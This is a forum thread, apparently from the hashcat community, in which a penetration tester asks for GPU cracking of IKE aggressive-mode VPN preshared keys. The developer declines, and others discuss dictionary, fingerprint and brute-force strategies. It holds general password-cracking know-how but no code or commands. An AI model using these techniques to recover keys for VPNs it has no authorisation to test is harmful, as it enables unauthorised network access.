IKE Preshared Key from Aggressive Mode VPNs
#1
1. Any thought to implementing "ikescan/psk-crack" functionality in hashcat?

2. Anyone know of a better solution to recovering PSKs than using psk-crack? I'm looking for a GPU or clustered solution.

Rainbow table use is not possible due to HMAC hashing of SHA1/MD5 value as I under it....

As a professional pentester of 10 years a GPU based cracking implementation for PSK aggressive mode seems like an obvious thing to do. I assume that I'm not aware of a GPU solution already implemented? Hope so anyway. We see over 90% of our clients allowing aggressive mode and I'm tried of saying it's 'possible' to break that key; I'd rather show them.

Thanks in advance.
#2
1. i have no plans for implementing psk auth cracking
2. no
#3
Well that's too bad. Just seem odd that psk cracking advancements just stopped around 07/08. I guess maybe I should ask what the mission statement or goal of the hashcat project is? The calculation numbers are pretty amazing and given the frequency we find aggressive mode key exchange used in the field, I think there is a real opportunity make some headlines with hashcat. Not to mention that they psk's are usually only alpha/num.
#4
it just started as practice of my coding skills and a lot fun when participating on the opencrack competition. the competition motivated me to find more efficient (new) cracking techniques such as fingerprint attack, permutation attack, new rules in the rule-engine, etc and then to find a good mixture of these new cracking techniques and the performance. btw, thats why the hashcat tools do not focus on brute-force cracking. so its all about fun and competition.
#5
I see, that makes sense. And I didn't really notice the dictionary focus.

What are people using for dictionaries?

I've compiled a 6 gig one all sort and uniq'd based on what torrent I've found. But even 6 gigs is completed in under 30mins with psk-crack.
#6
check out the oclhashcat fingerprint attack and see how it modifies dictionaries using the expander from the hashcat-utils and then use the result with itself or with any other dictionary.
#7

> As a professional pentester of 10 years a GPU based cracking implementation for PSK aggressive mode seems like an obvious thing to do

+1
Where do I have to sign ? Smile
#8
(03-19-2012, 05:06 PM)hermix Wrote: > As a professional pentester of 10 years a GPU based cracking implementation for PSK aggressive mode seems like an obvious thing to do

+1
Where do I have to sign ? Smile

+2!

This is a great thread that both gives insight into the drivers of Hashcat (which I totally understand and agree with by the way) and also points out an important aspect of the professional security testing industry - the possibility to give practical proof of "theoretical" weaknesses.

As Hashcat is now becoming a _fantastic_ bruteforce tool, even though might not be the primary focus, I would really love to see some work being done to provide support for IKE PSK cracking. Well actually, this has nothing to do with bruteforce vs more intelligent types of cracking, I would just love to see support for IKE PSK cracking (no matter if its with standard Hashcat or through ocl)!
#9
Dictionary attack is good for system without password rules. Find only 20-30% password (with rules). Good setting system accept only >12 character password complex password. How many words have >12 character ?
Passwords is language dependence, other language use other character set.
oclhashcat is good for very fast brute-force ...
Good idea is implemented Markov Model of Natural Language for password generator

SHA1-HMAC and MD5-HMAC is very good for pen-testing. All corporation use VPN and without test group key not test wan security.

D.
#10
+1 from me Smile